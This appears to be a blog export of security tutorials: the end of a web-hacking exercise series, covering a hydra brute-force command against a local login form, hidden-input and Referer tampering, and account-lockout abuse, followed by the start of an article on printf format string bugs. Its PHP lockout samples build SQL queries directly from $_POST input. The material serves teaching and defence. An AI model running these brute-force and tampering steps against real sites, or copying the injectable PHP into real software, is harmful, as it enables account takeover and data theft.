<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">AuthType Basic
AuthName "Admin Area"
AuthUserFile path\authorized.htpasswd
Require user …
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can select only particular users to be able to access the page, and you can set different username lists for different parts of the website, but this mechanism for protection remains basic. To test cracking the example from the files, change the path of AuthUserFile to the current location of the HTTPSecurity directory.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack2.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 5: Breaking a POST login form</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The password and usernames list are in the FormCracking folder. They have not been changed, but the correct login credentials are easy enough.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The following statement might work:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
hydra –L path/FormCracking/usrnames.txt -P path/FormCracking/passwords.txt 127.0.0.1 http-post-form</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
“/FormCracking/index.php:username=^USER^&passwd=^PASS^:Oops”</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack3.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The difference between this statement and when we cracked the HTTPAuth mechanism is that here we include the parameters that the form sends to the server-side script, in this case username and password. Those are the “name” attributes of the relevant input tags that we want to test.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack4.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 2: viewing the POST fields.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Another difference is that after the address that we want to crack we include separated by a colon ( : ) the text that shows when the login submission is incorrect. Basically, we are telling the program to repeat until it gets a different output. In our case, we have “Oops” as a part of the login error string we receive.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We also include ^USER^ and ^PASS^ after each POST field that must be filled with the data from the username and password lists by the program.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Then, we wait and the job is done.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 6: Modifying Parameters</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The next exercise is in the folder ParameterTampering. Open ParameterTampering/login.php with your browser. Your task is to bypass authorization or login with wrong credentials without viewing the server-side code and accessing members.php message and members2.php without the “Error!”. You do not have to crack the user details. For one of the methods, you must see what logging in looks like – use john/123</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The first manner in which you can do this is by modifying an element in the page, the second involves a change in the URL.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The other task is to enter in members2.php without the server echoing “Error”. To do this, you should tamper with the HTTP Headers and add a referrer. I would recommend a plugin such as Tamper Data for Firefox or Request Maker for Chrome.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Answers:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
1st possibility:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack5.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 3: modifying the values of hidden inputs.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It might seem weird at first, but many sites actually have hidden inputs in which they store important data. An example is PayPal shopping carts on third-party websites where you can change fields such as name of the product directly by changing the value of a hidden input. There are some outdated shopping carts which still use price as a hidden input which means that if you don’t use their API and verify the amount that was paid to you through a server-side script – the user can easily pay as much as he wants for the product!</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack6.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 4: an example of a shopping cart which sets the price of the item on the client-side.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack7.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 5: changing the name of the product in stores using PayPal as a payment method can still do some harm.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
2nd possibility:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Setting a loggedin GET request, that’s probably not something you would meet somewhere today though.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
3rd possibility, members2.php:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Install and start Tamper Data with alt+T when the page is opened. Add a new Header…</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack8.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Called Referer and with value the path to login.php, it would look like you were redirected from login.php. There are developers out there who think HTTP_REFERER proves that the user is legitimate despite that it’s just a header sent through HTTP requests, and this is a point of exploitation in some sites even today.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 7: Exploiting Account Lockout</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you have a simple lockout mechanism like this (PHP/MySQL (AccountLockout1 folder)):</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">// Connecting to the MySQL database
mysql_connect("localhost", "root", "") or die(mysql_error());
mysql_select_db("userdb") or die(mysql_error());
// Loading the current number of attempts that the user have used
$attempts = mysql_fetch_array(mysql_query("SELECT attempts FROM users WHERE username = '" . $_POST['username'] . "'"))[0];
//If the login credentials are incorrect – add 1 to attempts variable
else if ($_POST['pass'] != $info['password']) {
$attempts +=1;
echo "This is your " . $attempts . " attempt!
";
//Stop the rest of the code from executing if the user have attempted to login with incorrect details at least three times
if ($attempts > 2) {
die("</pre>
<h1>This account is locked. Contact the administrator at sysadmin@samplesite.com</h1>
<pre>
");
}
// Update the attempts column of the particular user in the database
mysql_query("UPDATE users SET attempts=" . $attempts . " WHERE username = '" . $_POST['username'] . "'");
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If we have such a login form and we are relying on a plugin from WordPress or Joomla and we are not aware of that – then malicious people can block an account just by knowing the username. In many sites, the username is readily available such as in comments to articles, message boards, social media likes, etc.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A solution is both to block only the offending IP address and to provide the block only for a limited duration.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A sample solution of adding a duration for the account lockout In PHP/MySQL could look something like this:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">//folder AccountLockout2
// Inject SQL code
CREATE TABLE users(
ID MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
username VARCHAR( 60 ) ,
passwordVARCHAR( 60 ) ,
attempts TINYINT,
time TINYINT)
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Adding a user to the database could look like:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">$insert = "INSERT INTO users (username, password, attempts, time)
VALUES ('".$_POST['username']."', '".$_POST['pass']."', '" . "0'" . " , '-1'" . ")"; //attempts //time when lockout was set
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We use the number -1 to indicate that there is no lockout.<br style="box-sizing: border-box;" />Then we change a bit the old code:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if ($attempts > 2) {
// If there no lockout, create one and notify when the account is going to be active
if ($info["time"] == "-1" ) {
$expectedRelease = date("H") + 1;
mysql_query("UPDATE users SET time=" . date("H") . " WHERE username = '" . $_POST['username'] . "'");
die("</pre>
<h1>This account is locked. Contact the administrator at sysadmin@samplesite.com"
. ". It is going to be active at: ". $expectedRelease . " o' clock</h1>
<pre>
");
}
// Otherwise, remove lockout
else if ($info["time"] != -1 && date("H") > intval($info["time"])) {
mysql_query("UPDATE users SET time='-1' WHERE username = '" . $_POST['username'] . "'");
$attempts = 0;
}
else {
//If the account already has locked out and one hour has not passed, just say it is locked and quit
die("</pre>
<h1>This account is locked. Contact the administrator at sysadmin@samplesite.com</h1>
<pre>
");
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This simple script will lockout the account after 3 attempts for different periods of time – until a full hour has passed since the lockout. It can be found in the AccLockoutDuration folder.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It is yet even better to create an IP ban and implement a better version of the above script as it serves demonstrative purposes only.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 8: yet to come…</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 13pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 17.3333px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Conclusion</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
</div>
<div class="ig_inline_container ig_the_content ig_after" style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin: 0px; padding: 0px; vertical-align: baseline;">
</div>
<nav class="series-pagination" style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin: 32px 0px 0px; padding: 0px; vertical-align: baseline;"><ul style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 11px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 36px; list-style: none; margin: 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline; width: 620px;">
<li class="next" style="background: rgba(0, 0, 0, 0.14902); border-radius: 3px; border: 0px; box-sizing: border-box; float: right; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; width: 248px;"></li>
</ul>
</nav><br />
<div style="-webkit-text-stroke-width: 0px; border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25.9px; margin: 0px 0px 1em; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
We have barely covered the topic of website hacking and web security, as this is a vast field to touch upon. Yet, I hope future articles would reveal more and more of this field, as the leakage of data could not only harm the reputation of your business, the trust of your clients, the well-being of clients, but also can put you in front of serious legal proceedings.</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-65569708731548378532016-01-07T14:10:00.000+05:302016-01-07T14:10:43.476+05:30Format String Bug Exploitation<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.nextmedia.com.au/News/Computer_Bug_Virus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.nextmedia.com.au/News/Computer_Bug_Virus.jpg" height="424" width="640" /></a></div>
<br />
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">ABSTRACT</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The Format String vulnerability significantly introduced in year 2000 when remote hackers gain root access on host running FTP daemon which had anonymous authentication mechanism. This was an entirely new tactics of exploitation the common programming glitches behind the software, and now this deadly threat for the software is everywhere because programmers inadvertently used to make coding loopholes which are targeting none other than Format string attack. The format string vulnerability is an implication of misinterpreting the stack for handling functions with variable arguments especially in <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function, since this article demonstrates this subtle bug in C programming context on windows operating system. Although, this class of bug is not operating system–specific as with buffer overflow attacks, you can detect vulnerable programs for Mac OS, Linux, and BSD. This article drafted to delve deeper at what format strings are, how they are operate relative to the stack, as well as how they are manipulated in the perspective of C programming language.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">ESSENTIALS</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To be cognizance with the format string bug explained in this article, you will require to having rudimentary knowledge of the C family of programming languages, as well as a basic knowledge of IA32 assembly over window operating system, by mean of visual studio development editor. Moreover, know-how about ‘buffer overflow’ exploitation will definitely add an advantage.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">FORMAT STRING BUG</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The format string bug was first explained in June 2000 in a renowned journal. This notorious exploitation tactics enable a hacker to subvert memory stack protections and allow altering arbitrary memory segments by unsolicited writing over there. Overall, the sole cause behind happening is not to handle or properly validated the user-supplied input. Just blindly trusting the used supplied arguments that eventually lead to disaster. Subsequently, when hacker controls arguments of the<em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function, the details in the variable argument lists enable him to analysis or overwrite arbitrary data. The format string bug is unlike buffer overrun; in which no memory stack is being damaged, as well as any data are being corrupted at large extents. Hackers often execute this attack in context of disclosing or retrieving sensitive information from the stack for instance pass keys, cryptographic privates keys etc.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now the curiosity around here is how exactly the hackers perform this deadly attack. Consider a program where we are trying to produce some string as “kmaraj” over the screen by employing the simple C language library <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> method as;</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Program: sample code</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">#include "stdio.h"
int main(){
string sVal="kmaraj";
printf("My name is %s",sVal);
return 0;
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The above program code seems quite simple, where at line 5, it turns out the first parameter can specify a string using %s format specifiers which causes <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em>method to replace the %s with the content of null-terminating string buffer. However, everything gets going good at first glance, but what if the programmer doesn’t specify the format string specifiers in the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> method. The program will again compile and run error-free and produce desired output but this time exploitable to Format String Attack.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">MISINTERPRETING THE STACK</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In the prior section, you have discovered how the hacker manipulates the format string bug. Subsequently, in this section, how the stack is being misinterpreted by mean of this bug will be explored. Suppose in the earlier program, you accomplish the task by most obvious direct way, without using the ‘specifier’ in the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em>method as following;</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">printf("My name is %s",sVal); printf(sVal);
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In fact, both of the preceding printf implementation will achieve the same undertaking. However, which one among those is more secure and better? When analyzing the printf stack usage in C programming, it is detected that the arguments placement in the stack happens from last to first as. The assembly representation of first code block (with specifiers) in the stack as following;</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">push address of "sVal"
push address of "%s"
call printf
</pre>
